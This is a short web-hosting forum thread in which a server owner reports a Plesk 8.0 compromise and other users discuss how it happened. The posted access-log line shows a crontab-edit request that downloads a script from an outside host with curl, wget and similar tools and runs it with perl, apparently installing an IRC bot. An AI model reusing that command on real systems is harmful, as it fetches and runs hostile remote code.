• We value your experience with Plesk during 2025
    Plesk strives to perform even better in 2026. To help us improve further, please answer a few questions about your experience with Plesk Obsidian 2025.
    Please take this short survey:
    https://survey.webpros.com/

Security Violation plesk 8.0.X

S

stewartrose

Guest
Just for interest..

Hacked through Plesk control panel.

httpsd_access_log:xxx.xxx.xxx.xxx - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/usr/local/lib/;killall%20-9%20perl;rm%20-rf%20flaviu;curl%20-O%20http://flaviu.ro/flaviu;wget%20http://flaviu.ro/flaviu;lynx%20-source%20http://flaviu.ro/flaviu;fetch%20www.flaviu.ro/flaviu;GET%20http://flaviu.ro/flaviu;perl%20flaviu;rm%20-rf%20x* HTTP/1.1" 200 366

All the best from Alan
 
Thats a risk you take whenever you allow a user to modify cron. They can execute any command on the system that they want.

What happened there is that someone with a valid logon set up a cron job to download that script (an irc zombie bot) and run it.
 
Hi atomicturtle,

Not quite, no one has access to the cp but me, and my passwords are very strong, the code given uploads data through the exploit..

all the best from Alan
 
Then its possible your desktop has been compromised. You cannot access the cron settings without being logged into the CP.
 
You must log in or register to reply here.

Similar threads

T
Upgrade Phpbb Now!!! 2.0.15
Replies
1
Views
3K
Outlaw
O
Back
Top